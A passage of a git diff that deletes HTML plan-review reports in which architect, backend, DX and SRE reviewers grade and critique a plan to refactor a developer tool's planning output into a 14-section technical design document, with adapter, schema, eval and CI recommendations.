| AC9 | Estimation feasibility | A- | Detail is sufficient for confident estimation. EPIC-3-S2 (14 missing-section fixtures + drift + vague-TBD) is the largest unit of work and could be split for tighter sizing. |
| AC10 | Definition of Done alignment | B+ | DoD is implied: code change + eval fixture + RED→GREEN paper trail (CLAUDE.md mandate). No explicit mention of code review, deploy-to-staging, or user-facing CHANGELOG. |
| AC13 | Milestone coverage | A | Every milestone has covering stories: M1 = 8, M2 = 3, M3 = 2. No milestone is empty. |
| AC14 | Milestone reference integrity | A | Every story's milestone_id is M1, M2, or M3; all match sidecar.milestones[].id. No dangling references. |
| AC15 | Milestone exit criteria testability | A | All exit criteria are testable. |
| AC16 | Milestone DAG integrity | A | DAG is M1 → M2 → M3. Linear chain, no cycles. |
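
The milestone checks graded in AC14 and AC16 (no dangling references, no cycles) are mechanical, so they can be sketched in a few lines. This is an illustration only: it assumes each milestone is a dict with an `id` and an optional `depends_on` list, as the mention of `sidecar.milestones[]` suggests, and `milestone_order` is a hypothetical helper name.

```python
from graphlib import CycleError, TopologicalSorter


def milestone_order(milestones: list) -> list:
    """Return milestone ids in dependency order.

    Raises ValueError on a dangling depends_on reference or on a cycle.
    """
    known_ids = {m["id"] for m in milestones}
    graph = {}
    for m in milestones:
        deps = m.get("depends_on", [])
        missing = [d for d in deps if d not in known_ids]
        if missing:
            raise ValueError(f"{m['id']} depends on unknown milestone(s): {missing}")
        graph[m["id"]] = set(deps)  # node -> its predecessors
    try:
        return list(TopologicalSorter(graph).static_order())
    except CycleError as exc:
        # graphlib stores the detected cycle as the second element of args.
        raise ValueError(f"milestone cycle: {exc.args[1]}") from exc
```

For the linear chain described above, the only valid order is M1, M2, M3.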
-

Key Finding: Sprint-ready plan — every story has crisp file targets, exact thresholds, named errors, and testable ACs; the milestone DAG and reference integrity are clean; the only meaningful gap is that the largest story (EPIC-3-S2) could be split for finer estimation, and DoD's code-review/changelog rituals are implicit.

-

Recommendations

| Priority | Point | Recommendation |
| --- | --- | --- |
| P2 | AC9 | Split EPIC-3-S2 into two stories: (a) "Build negative-fixture generator + 14 missing-section fixtures" and (b) "Author drift-by-addition + vague-TBD fixtures." |
| P2 | AC6 | In EPIC-4-S3, name the adapter file per tool instead of "Update the relevant adapter logic." |
| P2 | AC10 | Add one cross-cutting AC requiring a CHANGELOG entry / migration note documenting the cutover. |
| P2 | AC2 | Make intra-milestone story ordering explicit (e.g., EPIC-1-S2 depends on EPIC-1-S1 slug list; EPIC-3-S2 depends on EPIC-3-S1 positive fixture). |
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
deleted file mode 100644
index 3d281ad2..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
+++ /dev/null
@@ -1,149 +0,0 @@
Plan Review — /plan TRD refactor

Architect — Detailed Findings

-
-

Back to summary

-
-

Architect Review (Grade: B)

| # | Evaluation Point | Grade | Notes |
| --- | --- | --- | --- |
| CA1 | Artifact/component topology | A | The artifact graph is well-formed: research.md → trd.md (14 sections w/ stable kebab anchors) → plan.json (stories with design_refs[] pointing at TRD anchors) → /pm-sync adapters → PM tools. Anchor scheme ({#section-id}) is explicitly defined as the join key. EPIC-1-S1 publishes the slug allow-list as a machine-readable sidecar under shield/schema/ so eval/review/generator all import from the same source: a single source of truth. |
| CA2 | Schema/template growth | B | Schema evolution path is explicit: 1.1 → 1.2 (design_refs[]) → 1.3 (last_aligned_with), each additive. Gap: the plan does not specify what happens when the 14-section list itself needs to evolve. A template_version field on TRD frontmatter would close this. |
| CA3 | Backward compatibility | A | Backward compatibility is rigorously asserted across every schema change. Adapters without link affordance log and continue gracefully. Old plan-architecture.md files explicitly preserved. |
| CA4 | Cross-tool / cross-domain reach | B | Multi-tool reach well covered. Multi-domain reach is headline (one TRD, two domains). Gap: "Mixed → annotate per section" is a single sentence with no worked example or fixture. A monorepo with both *.tf and pyproject.toml is realistic and the plan punts. No mixed-domain positive fixture in EPIC-3-S1. |
| CA5 | Contract/interface design across components | A | Contract surfaces are tight: design_refs[] shape fully defined; section anchors use explicit {#section-id} kebab-case; slug allow-list machine-readable; LLD placeholder shape precisely specified. Forward-looking contract that lets /lld resolve TODOs later without schema change. |
| CA6 | Blast radius / failure-mode isolation | B | Several failure modes explicitly handled and isolated (re-run safety, PM-sync degraded mode, eval gates cutover, undead-doc drift countered). Gaps: (a) stale design_refs[].anchor_url when section renamed/deleted between runs, which /plan-review has no way to detect; (b) last_aligned_with race when working tree is dirty; (c) eval fixture set falling out of sync with live slug allow-list. |
| CA7 | Mechanism choice for each concern | B | Mostly well-reasoned (markdown anchors, eval-as-enforcement, additive schema growth, substring-overlap for duplication detection). Concerns: (a) EPIC-4-S2 "> 80 characters" magic number undefended; (b) EPIC-5-S2 ">20 lines" same; (c) last_aligned_with records commit SHA but doesn't capture whether the TRD itself has changed since that SHA; a trd_sha content hash would catch post-commit edits. |
| CA8 | Positive ↔ negative fixture parity & template ↔ eval ↔ review consistency | B | Parity mostly enforced. 14 missing-section negatives derived from positive by removing one: the right pattern. Slug allow-list imported by generator + eval + review. Gaps: (a) no round-trip integration eval (/plan output → /plan-review says no Criticals); (b) no positive fixture for mixed-domain or LLD-TODO placeholder shape; (c) EPIC-3-S3 AC says "13 negatives" while the actual count is 14 missing-section + 1 drift + 1 vague-TBD = 16. Off-by-N inconsistency between AC text and fixture inventory in EPIC-3-S2. |
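
The substring-overlap mechanism named under CA7 can be made concrete with the standard library. This is a sketch under assumptions: the plan's actual algorithm is not shown in this review, the function names are hypothetical, and the default threshold of 80 is the quoted "> 80 characters" value exposed as a parameter, which is one way to address the magic-number concern.

```python
from difflib import SequenceMatcher


def longest_verbatim_overlap(a: str, b: str) -> str:
    """Return the longest run of consecutive characters shared by a and b."""
    # autojunk=False disables difflib's "popular element" heuristic, which
    # would otherwise skip frequent characters in inputs of 200+ characters.
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    match = matcher.find_longest_match(0, len(a), 0, len(b))
    return a[match.a:match.a + match.size]


def is_duplicated(a: str, b: str, threshold: int = 80) -> bool:
    """Flag two passages whose verbatim overlap exceeds `threshold` characters."""
    return len(longest_verbatim_overlap(a, b)) > threshold
```

A character-level match is sensitive to whitespace and re-wrapping, so a real rule would probably normalize both passages first; that step is left out here.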
-

Key Finding: The plan has unusually rigorous artifact-topology design but leaks credibility through small inconsistencies — plan-architecture.md still says "13-section" at lines 25, 37, 75; EPIC-3-S3 says "13 negatives" when EPIC-3-S2 enumerates 16; the mixed-domain path is asserted ("Mixed → annotate per section") without a worked example or fixture. Headline architectural choices are sound; gaps are in edge-case completeness.

-

Recommendations

| Priority | Point | Recommendation |
| --- | --- | --- |
| P1 | CA8 | Fix the negative-fixture count inconsistency. plan.md EPIC-3-S3 AC says "all 13 negatives fail" but EPIC-3-S2 enumerates 16. Pick a number and propagate. |
| P1 | CA8 | Fix the stale "13-section" references in plan-architecture.md (lines 25, 37, 75). Reconcile to 14 everywhere. |
| P1 | CA4 | Add a worked example and at least one eval fixture for the mixed-domain case: (a) positive-mixed/ fixture, (b) explicit guidance in plan-docs/SKILL.md, (c) detection rule for mixed (both infra and backend markers). |
| P1 | CA6 | Specify stale-anchor detection. Add an AC to EPIC-4-S1: "/plan-review reports any design_refs[].anchor_url whose #section-id is not present in the linked trd.md as a Critical finding." |
| P2 | CA7 | Defend or parameterize the magic numbers (>80 char overlap, >20 line code block). |
| P2 | CA7 | Consider adding trd_sha (content hash) alongside last_aligned_with (commit SHA) in EPIC-5-S1. |
| P2 | CA2 | Add a TRD template_version field so legitimate template evolution doesn't trigger the drift-by-addition negative. |
| P2 | CA8 | Add a round-trip integration eval: /plan output → /plan-review asserts no Critical findings. |
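
The stale-anchor rule recommended for CA6 is a set-membership check once the {#section-id} anchors have been collected from trd.md. A minimal sketch follows, assuming anchors appear literally as `{#kebab-case-slug}` in the Markdown and that each story is a dict with `id` and `design_refs`; `trd_anchors` and `stale_refs` are hypothetical names, not existing /plan-review code.

```python
import re
from urllib.parse import urlsplit

# Matches explicit anchors such as {#api-create-user}; kebab-case only.
ANCHOR_RE = re.compile(r"\{#([a-z0-9]+(?:-[a-z0-9]+)*)\}")


def trd_anchors(trd_markdown: str) -> set:
    """Collect every explicit section anchor declared in the TRD text."""
    return set(ANCHOR_RE.findall(trd_markdown))


def stale_refs(stories: list, trd_markdown: str) -> list:
    """Return (story_id, fragment) pairs whose TRD anchor no longer exists."""
    known = trd_anchors(trd_markdown)
    findings = []
    for story in stories:
        for ref in story.get("design_refs", []):
            if ref.get("doc") != "trd":
                continue  # LLD/PRD refs would be checked against their own docs
            fragment = urlsplit(ref["anchor_url"]).fragment
            if fragment not in known:
                findings.append((story["id"], fragment))
    return findings
```

Each returned pair would map to one Critical finding under the proposed AC.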
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
deleted file mode 100644
index d4142e75..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
+++ /dev/null
@@ -1,165 +0,0 @@
Plan Review — /plan TRD refactor

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Backend Engineer Review (Grade: C+)

-

Scope: Python-touching stories in Shield's own codebase. Primary target: EPIC-4-S3 (adapter changes). Secondary: EPIC-2-S1 / EPIC-5-S1 (schema bumps), EPIC-3-S1/S2/S3 (eval wiring).

Stack detected: Python (uv-managed). pyproject.toml at shield/adapters/clickup/, plus shield/adapters/sast/*/pyproject.toml. No framework-specific Python skills yet, so the agnostic review applies.

-

Score Summary

| Evaluation Point | Grade | Rationale |
| --- | --- | --- |
| API design / adapter interface stability (EPIC-4-S3) | C | Schema shape locked, but adapter contract (signature, return type, error model, per-tool retry/idempotency) unspecified |
| Schema versioning discipline (EPIC-2-S1, EPIC-5-S1) | B | Bumps to 1.2/1.3 with explicit back-compat statements; no formal $id/$schema, no validator, no rejection of unknown future versions |
| Testing strategy (EPIC-3 + EPIC-4-S3 fixtures) | B- | Strong fixture topology for TRD format; per-adapter fixtures only sketched, with HTTP-mocking strategy, fault-injection, and idempotency replay absent |
| Framework patterns / uv-based deps (adapter package layout) | D | Plan adds adapter logic in shield/adapters/ for Confluence/Jira/Notion but only clickup is a packaged uv module today; no story scaffolds new packages, deps, or test harness |
| Error & observability (adapter failure modes) | D+ | One log-line described; no structured logging, no partial-failure semantics, no metric/event surface |
| Concurrency & idempotency (sync re-runs, design_refs upserts) | D | EPIC-2-S2 mentions "preserved or updated in place"; nothing about idempotent remote-link upsert (Jira/Confluence remote-links can dupe on re-run without externalId) |
| Deployment safety / blast radius (direct cutover) | C | Direct cutover acknowledged; rollback path documented; but no kill switch, no canary, and EPIC-1-S2 mutates output-paths.yaml keys (consumer-facing contract) |

Composite: C+ — the plan's what is well-shaped; the how leaks responsibility to implementation time for the parts that historically cause incidents (adapter idempotency, partial failures, schema validator wiring).

-

Detailed Evaluation

-

1. API design / adapter interface stability — C

-

What the plan says:

-
  • EPIC-4-S3 task: "Update the relevant adapter logic (Python under shield/adapters/) for each tool: Confluence remote link, Jira remote-issue-link, ClickUp URL custom field, Notion URL property."
  • EPIC-4-S3 task: "Adapters that do not understand design_refs[] (or have no link affordance) log 'design_refs forwarding skipped — adapter does not support web links' instead of failing."

Gaps:

-
  • No adapter interface contract. No Python function/method signature for design_refs[] forwarding. Without a typed contract, four adapters will drift in shape.
  • No return-type discipline. pm-sync already has a pm_sync MCP tool surface (shield/adapters/clickup/server/tools/sync.py:115). The plan doesn't say how the new forwarding result threads back into the existing sync_auto_link action_log path.
  • The four adapters are heterogeneous on link semantics: Jira remote-issue-link, Confluence remote-link, ClickUp URL custom-field, Notion URL property. The plan treats them as a single bullet.
  • No idempotency key. Jira/Confluence remote-links accept a globalId precisely so reruns don't duplicate.

2. Schema versioning discipline — B

-

Strengths: Two version bumps with explicit back-compat statements. DesignRef shape published. last_aligned_with: string | null precisely typed.

-

Gaps:

-
  • No machine-readable JSON Schema. The sidecar schema lives as prose+jsonc. No validator, no story to add one. This is the inflection point where prose-only schemas drift.
  • No forward-compat policy. What does /plan-review do when it encounters version: "1.4" from a future Shield?
  • doc ∈ {trd, lld, prd} is an enum but the plan does not say whether it's enforced. Unknown doc should fail validation.
  • design_refs[] cardinality. EPIC-2-S2 says "at least one TRD design_ref per story"; this should be lifted into sidecar-schema.md as a "minimum 1" constraint.

3. Testing strategy — B-

-

Strengths: TRD-format eval matrix genuinely well-designed. 14 missing-section + drift + vague-TBD is right shape and matches CLAUDE.md eval-coverage mandate. "Named, distinguishable error" requirement (EPIC-3-S2 AC) is a sharp testability bar.

-

Gaps:

-
  • Adapter fixtures are one bullet for four heterogeneous REST APIs. No mention of responses/vcrpy/in-memory fake. shield/adapters/clickup/tests/test_contract.py already exists; the plan should explicitly extend that pattern.
  • No re-run / idempotency test. EPIC-2-S2 AC says "Re-running /plan does not duplicate entries." Where is the fixture proving this? Same for EPIC-4-S3.
  • No failure-injection fixture for partial-success. Confluence accepts, Jira 5xxs: does /pm-sync exit non-zero? Continue?
  • EPIC-3-S2 AC undercounts negatives. "14 missing-section" + drift + vague-TBD = 16 total. EPIC-3-S3 says "all 13 negatives fail": 14 vs 13 inconsistency.

4. Framework patterns / uv-based deps — D

-

This is the weakest point.

-
  • Only one adapter exists today as a uv package. Repo has shield/adapters/clickup/pyproject.toml and that's it. There is no shield/adapters/jira/, confluence/, or notion/. EPIC-4-S3 implies four-tool work but contains zero scaffolding tasks.
  • CLAUDE.md mandates uv-only Python. Each new adapter needs its own pyproject.toml declaring deps like atlassian-python-api or requests, plus a dev-dep for the test harness. Plan does not name any HTTP-client library.
  • No shared utility module. Four adapters will need the same DesignRef dataclass, the same "skip if no link affordance" decision, and the same logging shape. No shield/adapters/_common/ story.

5. Error & observability — D+

-
  • One log line ≠ observability. No log level, no structured fields, no counter/event emission, no partial-failure surface.
  • No error taxonomy. What happens on malformed anchor_url? Adapter 401/403 vs 4xx vs 5xx? Rate-limited?
  • No retry policy. ClickUp adapter today almost certainly has retry/backoff. Plan doesn't say new adapters inherit it.
  • action_log integration. Existing clickup adapter writes structured records (action="sync_auto_link" at sync.py:319). EPIC-4-S3 should require a new action type forward_design_ref for traceability.

6. Concurrency & idempotency — D

-
  • Upsert semantics undefined. Jira's remote-issue-link API uses globalId for upsert; without one, every /pm-sync re-run posts a duplicate. Obvious idempotency key: globalId = sha256(story_id + anchor_url).
  • Confluence content-property vs inline-link distinction: Confluence has multiple "remote link"-shaped affordances and the plan does not pick one.
  • No concurrent-sync story. Two engineers running /pm-sync on the same plan: locking or last-write-wins?
  • EPIC-5-S1 last_aligned_with race: what if /implement flips two stories to done from concurrent sessions?

7. Deployment safety / blast radius — C

-

Strengths: Rollback path explicit. design_refs[] and last_aligned_with are additive. Pre-refactor folders stay readable.

-

Gaps:

-
  • shield/schema/output-paths.yaml is a consumer-facing contract. EPIC-1-S2 says "replace plan_arch_md with plan_trd_md." Header reads "Plugin-owned contract. Consumers should NOT edit." Consumers may depend on the key name. Plan should add plan_trd_md while keeping plan_arch_md deprecated.
  • No kill switch. "Direct cutover" with eval-shaped safety is reasonable for an internal tool, but worth one sentence acknowledging that the only remedy is revert-the-PR.
  • Cross-PR coupling. EPIC-2-S1 (schema 1.2) in M1; EPIC-5-S1 (schema 1.3) in M3. If M2 ships and M3 stalls, sidecars stay at 1.2 with no last_aligned_with. That is fine because the field is optional, but the plan should affirm it.

Recommendations

-

P0 (block merge of plan into implementation)

-

P0-1. Specify the adapter interface for design_refs[] forwarding (EPIC-4-S3). Lock the function signature and idempotency key across all four adapters: forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult with ForwardResult{created, skipped, errors}. Each ref produces sha256(story_id + anchor_url)[:32] used as globalId.
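
The contract proposed in P0-1 can be sketched to show why the key makes re-runs safe. Treat this as an illustration under assumptions rather than the adapter API: `InMemoryLinkStore` is a hypothetical stand-in for a remote PM tool, and the method takes a `story_id` plus raw anchor URLs instead of `task_id` and `DesignRef` objects to keep the example self-contained. Only the `ForwardResult{created, skipped, errors}` shape and the `sha256(story_id + anchor_url)[:32]` key come from the recommendation.

```python
import hashlib
from dataclasses import dataclass, field


def idempotency_key(story_id: str, anchor_url: str) -> str:
    """First 32 hex chars of sha256(story_id + anchor_url), used as globalId."""
    digest = hashlib.sha256((story_id + anchor_url).encode("utf-8")).hexdigest()
    return digest[:32]


@dataclass
class ForwardResult:
    created: list = field(default_factory=list)
    skipped: list = field(default_factory=list)
    errors: list = field(default_factory=list)


class InMemoryLinkStore:
    """Hypothetical fake of a remote tool that upserts links by globalId."""

    def __init__(self):
        self.links = {}

    def forward_design_refs(self, story_id: str, anchor_urls: list) -> ForwardResult:
        result = ForwardResult()
        for url in anchor_urls:
            key = idempotency_key(story_id, url)
            if key in self.links:
                result.skipped.append(key)  # already present: re-run is a no-op
            else:
                self.links[key] = url
                result.created.append(key)
        return result
```

Running the same sync twice leaves the store unchanged, which is the behavior the P0-2 fixture asks for.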

-

P0-2. Add an idempotency test fixture: "Running /pm-sync twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes."

-

P0-3. Add an adapter-scaffolding story or split EPIC-4-S3 by adapter. Only ClickUp exists as a uv package today. Either split into EPIC-4-S3a/b/c/d each with own scaffold, or add EPIC-4-S0: "Scaffold shield/adapters/{jira,confluence,notion}/ uv packages with pyproject.toml, MCP-server skeleton, tests/, and shared shield/adapters/_common/design_refs.py."

-

P0-4. Resolve the 14 vs 13 inconsistency across all artifacts.

-

P1 (fix before implementation milestone closes)

-

P1-1. Add a schema-validation story: shield/scripts/validate_plan.py using pydantic or jsonschema, invoked by /plan-review and the eval runner.
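
A validator of the kind P1-1 describes could start as plain Python before pydantic or jsonschema is chosen. The sketch below uses only the standard library and makes several labeled assumptions: stories live under a top-level `stories` key, unknown versions are rejected outright (one possible forward-compat policy, not a decided one), and the "at least one TRD ref" rule applies from version 1.2 onward. The error names are illustrative.

```python
KNOWN_VERSIONS = ("1.1", "1.2", "1.3")  # versions named in this review
ALLOWED_DOCS = {"trd", "lld", "prd"}
REF_FIELDS = ("doc", "section_id", "anchor_url", "label")


def validate_plan(plan: dict) -> list:
    """Return named error strings; an empty list means the sidecar passed."""
    version = plan.get("version")
    if version not in KNOWN_VERSIONS:
        # Assumed policy: refuse to guess at a schema from a future Shield.
        return [f"unsupported-version: {version!r}"]
    errors = []
    refs_expected = version != "1.1"  # design_refs[] arrives with 1.2
    for story in plan.get("stories", []):
        sid = story.get("id", "<missing id>")
        refs = story.get("design_refs", [])
        if refs_expected and not any(r.get("doc") == "trd" for r in refs):
            errors.append(f"missing-trd-ref: {sid}")
        for index, ref in enumerate(refs):
            for name in REF_FIELDS:
                if not isinstance(ref.get(name), str) or not ref[name]:
                    errors.append(f"bad-ref-field: {sid}[{index}].{name}")
            if ref.get("doc") not in ALLOWED_DOCS:
                errors.append(f"unknown-doc: {sid}[{index}]")
    return errors
```

Returning named strings rather than raising keeps every problem in one report, in the spirit of the "named, distinguishable error" bar praised in the testing section.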

-

P1-2. Document forward-compat policy in sidecar-schema.md.

-

P1-3. Specify the HTTP test harness: "Adapter eval fixtures use responses (or respx) to mock the remote APIs. No live HTTP. Tests tagged @pytest.mark.adapter_contract so they can run in CI without secrets."

-

P1-4. Specify observability shape: one action_log entry per ref forwarded with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit forward_design_ref_failed.
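
The observability shape in P1-4 amounts to one structured record per forwarded ref. A minimal sketch, assuming the record is a flat dict serialized as one JSON line; the `action_log_entry` helper and the outcome values ("created", "skipped", "failed") are hypothetical, while the action names and field list are the ones recommended above.

```python
import json


def action_log_entry(story_id: str, adapter: str, anchor_url: str,
                     outcome: str, idempotency_key: str) -> dict:
    """Build one action_log record for a single forwarded design ref."""
    # Assumed convention: any outcome other than "failed" counts as success.
    action = "forward_design_ref_failed" if outcome == "failed" else "forward_design_ref"
    return {
        "action": action,
        "story_id": story_id,
        "adapter": adapter,
        "anchor_url": anchor_url,
        "outcome": outcome,
        "idempotency_key": idempotency_key,
    }


def to_log_line(entry: dict) -> str:
    """Serialize with sorted keys so identical entries produce identical lines."""
    return json.dumps(entry, sort_keys=True)
```

Keeping the idempotency key in the record lets a reader match a log line to the remote link it created or skipped.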

-

P1-5. Add deprecation overlap for output-paths.yaml: keep plan_arch_md / plan_arch_html keys marked deprecated: true.

-

P2 (polish, not blocking)

-
  • Concurrent-sync acknowledgement in plan-architecture.md
  • Rate-limit handling note per existing adapter posture
  • Decide fate of this plan's own plan-architecture.md post-M1
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
deleted file mode 100644
index 2b699559..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/dx-engineer.html
+++ /dev/null
@@ -1,216 +0,0 @@
Plan Review — /plan TRD refactor

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

DX Engineer Review (Grade: B+)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| DX1 | Plan clarity | A | "Why this refactor" paragraph and milestone table give 30-second comprehension: "unified 14-section TRD replacing free-form plan-architecture.md, covers backend + infra, direct cutover." |
| DX2 | Story actionability | B | Most stories name exact files and concrete deltas. Gaps: EPIC-2-S2 names a "heuristic for picking section_id" but never defines what keyword-matching algorithm to use; EPIC-4-S3 says "the relevant adapter logic (Python under shield/adapters/)" without naming any of the 4 adapter files. |
| DX3 | Implementation step detail | B | Strong specifics in many places (slug allow-list verbatim, domain-detection markers enumerated, thresholds quantified). Weak spots: EPIC-3-S2 doesn't show the YAML schema; EPIC-3-S3 says uv run shield/evals/run.py plan-trd "or equivalent existing eval runner"; the author should commit to one. |
| DX4 | Ambiguity audit | B | Several soft phrases survived: EPIC-4-S2 "e.g., flag if > 80 characters" (advisory, not normative); EPIC-5-S2 "more than N lines" and only later pins N=20; EPIC-1-S2 "Mixed → annotate per section" is undefined; EPIC-2-S2 says entries are "preserved or updated in place" without saying which. |
| DX5 | Context sufficiency | A | Plan links to research.md, plan-architecture.md, and PR #43 sample. A new joiner can chase the references without tribal knowledge. |
| DX6 | Dependency clarity | A | Milestone-level depends_on is explicit. "M1 ships as a single PR" is called out. Eval-before-generator constraint is documented. Minor gap: story-level depends_on is implicit only. |
| DX7 | Tool & access requirements | C | uv implied by CLAUDE.md but never restated. EPIC-4-S3 needs Confluence/Jira/ClickUp/Notion credentials with no mention of test accounts, sandbox tenants, or how to mock. No mention of which Python version or new deps the eval runner might need. |
| DX8 | Handoff readiness | B | A developer can start EPIC-1-S1, EPIC-3-S1, EPIC-3-S2 cold. EPIC-4-S3 and EPIC-2-S2 would generate questions. Plan assumes familiarity with the current shape of the plan-docs/SKILL.md "generation prompt". |
| DX9 | Service boundaries | B | Boundaries are clean: shield/commands/plan.md, shield/skills/general/plan-docs/, shield/schema/output-paths.yaml, shield/adapters/<tool>/, shield/evals/. Gap: slug allow-list location is given as "YAML or JSON sidecar under shield/schema/" with choice left open. |
| DX10 | API & data flow design | B | design_refs[] contract is explicit. Schema bump path documented (1.1 → 1.2 → 1.3). Gap: no inline example design_refs[] JSON instance; EPIC-2-S2's "preserved or updated in place" merge semantics absent. |
| DX11 | Deployment strategy | B | "Direct cutover, no feature flag" is explicit. "M1 ships as a single PR" specifies atomicity. Old plan-architecture.md files preserved. Rollback strategy documented. Gap: no version bump checklist for .claude-plugin/marketplace.json and pyproject.toml per CLAUDE.md. |
| DX12 | CI/CD integration | C | EPIC-3-S3 names "Wire eval into CI" but tasks only describe manual PR-body capture. No GitHub Action, no workflow file path, no auto-discovery of new evals. Story title says CI but tasks describe manual capture. |
| DX13 | Error handling patterns | B | Several failure modes addressed (adapters without link affordance log + continue, n/a — <reason> escape, missing-reason flagged distinct from vague-TBD). Gaps: malformed trd.md recovery; unknown doc value in design_refs[]; retry/idempotency for /pm-sync partial failures. |
| DX14 | Configuration management | C | EPIC-1-S2 description says ".shield.json + repo markers" but plan.md drops the .shield.json mention. No mention of secrets management for 4 adapter credentials. Slug allow-list filename left to implementer. |
| DX15 | Developer onboarding | B | plan-architecture.md is fine onboarding. research.md named authoritative. CLAUDE.md covers conventions. Gap: no local-dev "how do I run /plan and see trd.md emit?" walkthrough; no debugging note for non-deterministic eval failures. |
-

Key Finding: The plan is one of the more actionable specs reviewed — concrete file paths, verbatim slug allow-list, specific thresholds, clear cutover stance — but four soft spots will generate Slack pings during execution: (1) design_refs[] section_id heuristic underspecified, (2) EPIC-4-S3 doesn't list 4 adapter file paths, (3) "CI" in EPIC-3-S3 is actually PR-body capture, (4) Mixed-domain "annotate per section" output format undefined.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P1 | DX2 | In EPIC-4-S3, replace "the relevant adapter logic (Python under shield/adapters/)" with the four explicit file paths and the function/class to extend in each. |
| P1 | DX4 | In EPIC-2-S2 tasks, define the section_id selection heuristic concretely: name the exact keyword-matching algorithm. |
| P1 | DX4 | In EPIC-2-S2 AC #3, replace "existing entries are preserved or updated in place" with a precise merge rule. |
| P1 | DX12 | In EPIC-3-S3, decide whether eval runs in GitHub Actions or only in PR-body capture. If CI is in scope, add a workflow YAML task; if not, retitle. |
| P1 | DX4 | In EPIC-1-S2, define what "Mixed → annotate per section" emits in the TRD prose. |
| P1 | DX7 | Add a "Tool & access requirements" subsection covering test tenants, credential location, Python deps. |
| P1 | DX14 | In EPIC-1-S2, decide and document: does domain detection consult .shield.json or only repo markers? The two documents disagree. |
| P2 | DX3 | In EPIC-3-S2/S3, lock the eval runner invocation. |
| P2 | DX9 | In EPIC-1-S1, choose YAML or JSON for the slug allow-list sidecar and commit to a filename. |
| P2 | DX10 | Add an inline example design_refs[] JSON instance to EPIC-2-S1 description. |
| P2 | DX11 | Add a task to EPIC-1-S2 (or a separate release story) for version bumps in .claude-plugin/marketplace.json and pyproject.toml. |
| P2 | DX13 | Add an AC or task covering /pm-sync partial-failure behavior when 1 of 4 adapters errors. |
| P2 | DX15 | Add a "local development" note describing how to run /plan against a fixture repo. |
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html deleted file mode 100644 index 027d83ec..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/sre.html +++ /dev/null @@ -1,148 +0,0 @@ - - - - -Plan Review — /plan TRD refactor - - - -

SRE — Detailed Findings

-
-

Back to summary

-
-

Operations Review — Plan (Grade: C)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| OP1 | Observability plan | C | Eval fixtures (EPIC-3) are the primary observability surface: they tell us when the TRD format drifts. last_aligned_with (EPIC-5-S1) is mentioned as undead-doc telemetry. But no plan for: emitting structured logs from /plan runs, capturing failure telemetry from real-user /plan invocations, or reporting on TRD generation quality in production. The eval is offline only. |
| OP2 | Monitoring & alerting | F | The plan says nothing about alerting on /plan failure or how regression in CI is surfaced. EPIC-3-S3 captures a PR-time RED→GREEN paper trail but doesn't wire the eval into ongoing CI, only into the implementation PR description. No mention of who is notified if the eval fails post-merge on a future change. No escalation path defined. |
| OP3 | Failure mode analysis | C | Some failure modes addressed (format drift via eval, undead-doc via last_aligned_with, re-run safety via EPIC-1-S3 guard). But several first-order failure modes from the refactor itself are not covered: (a) what happens when /plan runs but emits a malformed trd.md after M1 lands; (b) mixed-domain repos where domain detection misfires; (c) what happens if /plan-review (M2) ships against TRDs that pre-date M1's slug allow-list; (d) the eval cannot validate semantic correctness, only structure. |
| OP4 | Backup & recovery | B | Strong implicit answer: git history is explicitly called the archive. Existing plan-architecture.md files are preserved. RPO for the tool is effectively zero (everything is source-controlled markdown). RTO for a bad emit is "git revert + re-run /plan". Minor gap: no corruption-recovery for a half-written trd.md. |
| OP5 | Capacity planning | B | Not a scale-sensitive system. The plan implicitly handles growth by being additive. No explicit consideration of number of design_refs[] per story or whether the 14-section template scales to large/small features without padding. Acceptable for meta-tooling context. |
| OP6 | Change management | C | §Rollback Strategy is concrete. M1 is correctly identified as atomic-PR. However: (a) no canary or staged rollout; direct cutover is the choice but blast radius is every future /plan run; (b) no rollback trigger defined; (c) the version-bump discipline from CLAUDE.md is not in any story's task list. |
| OP7 | On-call readiness | D | Internal tooling, so no formal on-call. Proxy concerns: (a) what error message a user sees if trd.md generation fails mid-stream; (b) any troubleshooting runbook when /plan-review flags a TRD the user believes is correct; (c) where users report bugs against the new TRD format; (d) what version of the plugin a trd.md was generated by; there is no provenance stamp on emitted TRDs. The last_aligned_with field helps for drift but not for incident triage. |
-

Key Finding: The refactor has a solid format-correctness safety net (eval fixtures, RED→GREEN paper trail, atomic M1 PR) but lacks a runtime safety net — no continuous CI eval gate, no rollback trigger, no provenance stamping on generated trd.md files, and no failure-mode coverage for mixed-domain repos or interrupted /plan runs.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P0 | OP2 | Add a story to EPIC-3 wiring shield/evals/plan-trd.yaml into a recurring CI job (e.g., .github/workflows/), not just the implementation PR body. Without this, a future plan-docs/SKILL.md edit can silently break the 14-section contract. |
